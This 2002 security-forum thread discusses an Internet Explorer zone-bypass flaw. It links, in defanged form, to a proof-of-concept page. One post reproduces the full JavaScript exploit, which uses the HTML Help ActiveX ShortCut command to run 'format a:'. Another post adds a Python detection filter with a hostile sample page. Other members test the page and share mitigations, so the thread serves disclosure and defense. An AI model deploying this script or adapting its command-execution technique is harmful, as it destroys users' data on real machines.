Internet Explorer: serious flaw

Discussion in 'other security issues & news' started by Paul Wilders, Nov 10, 2002.

Thread Status:
Not open for further replies.
  1. Paul Wilders

    Paul Wilders Administrator

    Joined:
    Jul 1, 2001
    Posts:
    12,472
    Location:
    The Netherlands
    wwx.dino-soft.org/auto.html

    note: prefix altered in "wwx". Needs to be reversed into "www" to make the URL work - Forum Admin

    The above URL, when viewed, WILL FORMAT THE A:\ drive on a fully updated and patched Windows system. If you go there, make sure there is nothing on A:\ that formatting will harm, because this has been tested
    and works on Windows 2000, Windows XP Home/Corp/Pro and Windows 98/SE.

    This is a harmless POC to give you experts here a heads-up, because Microsoft HAS been informed of the hole, but they seem to be sitting on their hands, maybe much like the recent XP hole that they knew about before XP even shipped but chose to wait until SP1 to correct.

    This is VERY DANGEROUS, and this little harmless POC could quite easily be made quite nasty; but Microsoft had this to say to the author of the original hole, whose hole I have sort of legoised and made to work a very little bit differently:

    "Microsoft was initially contacted 2002-10-04. After several mail exchanges, their final response was that the technique used to run programs with parameters from the "Local computer zone" was no security vulnerability. A fix should instead be applied for all possibilities for content in the "Internet zone" to access the "Local computer zone"."

    quoted from elsewhere - Forum Admin
     
  2. JacK

    JacK Registered Member

    Joined:
    Jun 20, 2002
    Posts:
    737
    Location:
    Belgium - Liège
    Hi Paul,

    Running WinXP Pro SP1 and tried the address: no harm done.
    Just "parameter not valid" in a command box, and the Help of IE opened,
    plus on the web page "Testing IE Execute Exploit".

    Nothing formatted with a disk in A:\.

    Seems related to the flaw M$ Q323255 about Help (patch 021002).

    Rgds,
     
  3. LowWaterMark

    LowWaterMark Administrator

    Joined:
    Aug 10, 2002
    Posts:
    17,874
    Location:
    New England
    I'm not sure I understand the quoted Microsoft response. I looked at that site and it simply depends upon JavaScript, which I for one have disabled in the Internet Zone in IE. What I don't understand is the reference they make to the "local computer zone" (wasn't that the previous name for what is now called the "My Computer" zone?); I don't see how this relates to any other zone than the Internet Zone.

    This flaw gives people all the more reason to tighten up their security settings in IE (which is what I've done) or use another browser. I went to that site and nothing happened. Having scripting, ActiveX and Java disabled by default in the IE Internet Zone and then adding a list of trusted sites to the Trusted Zone and using something like IE-SpyAd for the Restricted Zone seems to address this type of POC exploit.

    Maybe I'm missing something.
     
  4. snapdragin

    snapdragin Administrator

    Joined:
    Feb 16, 2002
    Posts:
    8,415
    Location:
    Southern Ont., Canada
    Paul, forgive me, but I do not understand what this is saying.

    And... is this a vulnerability just with Internet Explorer, or the entire operating system? Would just using another browser be the only patch we could use until Microsoft comes out with one... or is XP still vulnerable to this no matter what browser is used? :doubt:

    (darn, it is getting harder to understand all these new exploits out there)

    thank you!
    snap
     
  5. snapdragin

    snapdragin Administrator

    Joined:
    Feb 16, 2002
    Posts:
    8,415
    Location:
    Southern Ont., Canada
    LowWaterMark - I didn't see your post before I posted mine..... I am SO glad I am not the only one that didn't understand the references to the "zones". Well, at least I am in good company!! :D

    and feeling a li'l zoned-out with Microsoft right now! LOL!

    snap
     
  6. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,330
    Location:
    Netherlands
    Same here plus an error in Adshield.

    Regards,

    Pieter
     
  7. Paul Wilders

    Paul Wilders Administrator

    Joined:
    Jul 1, 2001
    Posts:
    12,472
    Location:
    The Netherlands
    IMHO: that's the trick.

    snap,

    Read LowWaterMark's reply ;)

    regards.

    paul
     
  8. Paul Wilders

    Paul Wilders Administrator

    Joined:
    Jul 1, 2001
    Posts:
    12,472
    Location:
    The Netherlands
    Apologies - I'm hijacking a thread elsewhere now :rolleyes::

    "This requires Active Scripting turned on to run:

    <script LANGUAGE="JavaScript">

    prog = 'command';
    args = '/k format a: /autotest';

    if (!location.hash) {
    showHelp(location+"#1");
    showHelp("iexplore.chm");
    blur();
    }
    else if (location.hash == "#1")
    open(location+"2").blur();
    else {
    f = opener.location.assign;
    opener.location="res:";
    f("javascript:location.replace('mk:@MSITStore:C:')");
    setTimeout('run()',1000);
    }
    function run() {
    f("javascript:document.write('<object id=c1 classid=clsid:adb"+
    "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
    "=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
    "object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
    "-00aa003b7a11><param name=Command value=Close></object>')");
    f("javascript:c1.Click();c2.Click();c3.Click();");
    close();
    }
    </script>"

    regards,

    paul
     
  9. root

    root Registered Member

    Joined:
    Feb 19, 2002
    Posts:
    1,723
    Location:
    Missouri, USA
    I can see how the average user could get nailed with something like that, but I have that stopped several ways.
    Doesn't affect Opera, my firewall stops it, I have JS disabled, and probably have other protection against that happening.
    Scary thing is, obviously it works on some IE users. What if that were C instead of A? I wonder.
     
  10. Paul Wilders

    Paul Wilders Administrator

    Joined:
    Jul 1, 2001
    Posts:
    12,472
    Location:
    The Netherlands
    It most probably will work on - estimated guess - 90% of IE users, since not that many are PC/security savvy. Indeed: what if... :rolleyes:.

    regards.

    paul
     
  11. LowWaterMark

    LowWaterMark Administrator

    Joined:
    Aug 10, 2002
    Posts:
    17,874
    Location:
    New England
    I'd have to guess that the "local computer zone" (aka My Computer Zone) security settings come into play when IE Help is opened (or through the link beginning with "res:", which is local PC as well), and then the script tries to pass the necessary format command and parameters over to that window to be run...

    The key then is to not let such a site run any JavaScript in the first place, which is what exposes the actual zone-related flaw to exploitation.

    Yeah, I still stand by the concept of hardening your IE zones and populating the sites lists appropriately to protect against this and future unknown exploits.
     
  12. javacool

    javacool BrightFort Moderator

    Joined:
    Feb 10, 2002
    Posts:
    3,997
    I also get an error with Adshield... HOWEVER, it worked ONCE on my Windows XP system with Active Scripting, etc. enabled (trying it again, I still get an error and the rest described above).

    Good ol' Proxo - I just wrote a little rule for this just in case. ;)

    -Javacool
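    A content-filter check along the lines of the Proxomitron rule javacool mentions, covering the mechanism LowWaterMark describes (script opens a Help window, then pushes an HTML Help ActiveX "ShortCut" command into that local-zone window). This is an added example in Python, not javacool's rule or the POC author's code; the indicator names, verdict thresholds and both sample pages are constructed here, and the hostile sample names a harmless placeholder program rather than the format command.

```python
import re
from html import unescape

# CLSID of the HTML Help ActiveX control (HHCtrl) quoted in the posted POC.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

# One indicator per piece of the technique: Help window opened from script,
# local-zone URL scheme, the HHCtrl object, and its Command=ShortCut param.
INDICATORS = {
    "showhelp_call": re.compile(r"\bshowHelp\s*\(", re.I),
    "local_zone_url": re.compile(r"\b(res:|mk:@MSITStore:)", re.I),
    "hhctrl_object": re.compile("clsid:" + re.escape(HHCTRL_CLSID), re.I),
    "shortcut_command": re.compile(
        r"name=\"?Command\"?\s+value=\"?ShortCut", re.I),
}

def normalise(page: str) -> str:
    """Undo two things that hide indicators from a naive filter: HTML
    entities, and JavaScript string concatenation that splits a token
    across literals ("clsid:adb"+ "880a6-..." in the posted code)."""
    text = unescape(page)
    text = re.sub(r'"\s*\+\s*"', "", text)
    return re.sub(r"'\s*\+\s*'", "", text)

def scan(page: str) -> dict:
    """Report matched indicators and a verdict: 'block' when the HHCtrl
    object carries a ShortCut command, 'review' when two or more weaker
    indicators co-occur, otherwise 'allow'."""
    text = normalise(page)
    hits = {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}
    if hits["hhctrl_object"] and hits["shortcut_command"]:
        hits["verdict"] = "block"
    elif sum(hits.values()) >= 2:
        hits["verdict"] = "review"
    else:
        hits["verdict"] = "allow"
    return hits

# Constructed sample pages (not the one from the thread). The hostile one
# splits the CLSID across two literals as the posted POC does.
HOSTILE_SAMPLE = """<script>
if (!location.hash) { showHelp(location+"#1"); }
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\\",notepad,\\"></object>')");
</script>"""
BENIGN_SAMPLE = '<script>document.title = "hello" + " world";</script>'

if __name__ == "__main__":
    for label, page in (("hostile", HOSTILE_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan(page)["verdict"])
```

    Proxomitron-style filters match on the raw page text, so the concatenation step in normalise() is the part that matters against the posted snippet; without it the CLSID never appears in one piece.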
     
  13. Bethrezen

    Bethrezen Registered Member

    Joined:
    Apr 16, 2002
    Posts:
    546
    Hi,

    what is that exploit meant to do? I'm trying to find out if I am vulnerable or not.

    When I ran it I got

    an Adshield error, an IE box saying something like "testing exploit", and the help box opened.

    Is this what it is meant to do?
     
  14. LowWaterMark

    LowWaterMark Administrator

    Joined:
    Aug 10, 2002
    Posts:
    17,874
    Location:
    New England
    Bethrezen,

    It sounds like you got what JacK and Javacool got, and it did not do what it was supposed to do, which was format a floppy in the A:\ drive. Edit: Oops, and Pieter as well.
     
  15. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,330
    Location:
    Netherlands
    Hmmmz. :agonizing pain in the area my brain should be:

    I just set my ActiveX and Java to "Ask" and got exactly the same results; no questions asked.
    I'm gonna ponder on that with one ear on a pillow after I reset everything to "Disable".

    Regards,

    Pieter
     
  16. Bethrezen

    Bethrezen Registered Member

    Joined:
    Apr 16, 2002
    Posts:
    546
    Hi,

    so the question is: am I vulnerable to this type of thing?? Hmm, I wonder?!?!?!?!?!

    damn Microsoft

    [edit]

    A li'l bit hard to post more info on what I mean, as I don't really understand the vulnerability and what it's meant to do,

    but in a nutshell I meant I wonder if I'm vulnerable to this vulnerability and any other vulnerability that works in a similar fashion to this one.
     
  17. Paul Wilders

    Paul Wilders Administrator

    Joined:
    Jul 1, 2001
    Posts:
    12,472
    Location:
    The Netherlands
    If you set Active Scripting to "Prompt" in the scripting section, you will be safe.

    regards.

    paul
     
  18. JacK

    JacK Registered Member

    Joined:
    Jun 20, 2002
    Posts:
    737
    Location:
    Belgium - Liège
    Hello,

    Seems to me dsostop2.exe should prevent this flaw, by preventing running in the local zone :)

    Rgds,
     
  19. Paul Wilders

    Paul Wilders Administrator

    Joined:
    Jul 1, 2001
    Posts:
    12,472
    Location:
    The Netherlands
    JacK,

    That seems just another solution ;). For those interested, here's the link for this nifty small freeware app:

    www.nsclean.com/dsostop.html

    A copy can be grabbed from our downloads page as well.

    regards.

    paul
     
  20. Vietnam Vet

    Vietnam Vet Registered Member

    Joined:
    Feb 9, 2002
    Posts:
    306
    Concerning apps like dsostop2, htastop, or socklock: do these need to be reapplied after an upgrade such as IE6.0 SP1, or is it a once-is-enough kind of deal? Also, has anything been repaired :rolleyes:, so that these are unneeded or possibly harmful if reapplied?
     
  21. FanJ

    FanJ Guest

    Hi Vietnam-vet,

    As far as DSOstop2 and SockLock are concerned (I don't know about HTAstop because I use IEClean and don't need HTAstop), and as far as I know: you can always click on them and then they will let you know whether they still are enabled and protecting you.

    As for being harmful: I'm sure that Kevin would have let us all know (on a forum or on his site) about that!
    And you could always ask in the special PSC-forum at Becky's!
     
  22. Vietnam Vet

    Vietnam Vet Registered Member

    Joined:
    Feb 9, 2002
    Posts:
    306
    Hey FanJ, thanks for reminding me to turn my brain back on :rolleyes: Seriously, I just reclicked all three (only dsostop2 told me I was already protected), but since I would agree about Kevin warning about any danger, I think everything is fine. Thanks for the advice!
     
  23. Pieter_Arntz

    Pieter_Arntz Spyware Veteran

    Joined:
    Apr 27, 2002
    Posts:
    13,330
    Location:
    Netherlands
    I just learned that the error in the command prompt we got was caused by the /autotest parameter. This one is unknown in Windows NT/2k/XP.

    Regards,

    Pieter
     